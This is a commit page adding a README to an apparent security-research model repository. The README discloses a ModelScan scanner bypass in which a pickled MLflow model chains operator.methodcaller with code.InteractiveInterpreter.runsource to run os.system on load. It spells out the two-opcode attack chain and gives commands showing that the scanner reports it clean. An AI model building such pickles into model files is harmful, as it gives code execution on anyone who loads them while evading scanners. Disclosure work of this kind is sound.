xiaoyaoes commited on
Commit
11f8fad
·
verified ·
1 Parent(s): e7637e1

Upload README.md with huggingface_hub

Browse files
Files changed (1) hide show
  1. README.md +61 -0
README.md ADDED
@@ -0,0 +1,61 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ library_name: mlflow
3
+ tags:
4
+ - security-research
5
+ - modelscan-bypass
6
+ - code
7
+ - InteractiveInterpreter
8
+ - methodcaller
9
+ - rce
10
+ ---
11
+
12
+ # ModelScan code.InteractiveInterpreter Bypass — RCE via code.InteractiveInterpreter.runsource()
13
+
14
+ ## Summary
15
+
16
+ ModelScan's pickle scanner uses an `unsafe_globals` denylist to detect malicious pickle operations. However, **`code.InteractiveInterpreter`** and **`operator.methodcaller`** are NOT in the denylist.
17
+
18
+ This MLflow model achieves arbitrary Python code execution through `code.InteractiveInterpreter.runsource()`, while ModelScan reports zero issues.
19
+
20
+ ## Attack Chain
21
+
22
+ The pickle bytecode uses only two STACK_GLOBAL opcodes:
23
+
24
+ 1. `operator.methodcaller('runsource', '__import__("os").system("cmd")')` → Creates a callable
25
+ 2. `code.InteractiveInterpreter()` → Creates an interactive interpreter instance
26
+
27
+ At load time: `methodcaller(interpreter)` → `interpreter.runsource('__import__("os").system("cmd")')` → Arbitrary Python code execution
28
+
29
+ ## Why It Works
30
+
31
+ - `code` module is entirely absent from unsafe_globals
32
+ - `operator.methodcaller` is not blocked (only `operator.attrgetter` is)
33
+ - Unlike `os.system` which only runs shell commands, `runsource()` executes arbitrary Python code
34
+
35
+ ## Verification
36
+
37
+ ```bash
38
+ # 1. ModelScan says CLEAN
39
+ modelscan -p model.pkl
40
+ # Output: No issues found! 🎉
41
+
42
+ # 2. MLflow load triggers RCE
43
+ python3 -c "
44
+ import mlflow.pyfunc
45
+ model = mlflow.pyfunc.load_model('.')
46
+ "
47
+
48
+ # 3. Direct pickle.load() triggers RCE
49
+ python3 -c "
50
+ import pickle
51
+ with open('model.pkl', 'rb') as f:
52
+ pickle.load(f)
53
+ "
54
+ ```
55
+
56
+ ## Impact
57
+
58
+ - **Severity**: Critical (CVSS 9.8)
59
+ - **Affected**: All pickle-based formats scanned by ModelScan
60
+ - Remote, no auth needed, no user interaction
61
+ - Executes arbitrary Python code (not limited to shell commands)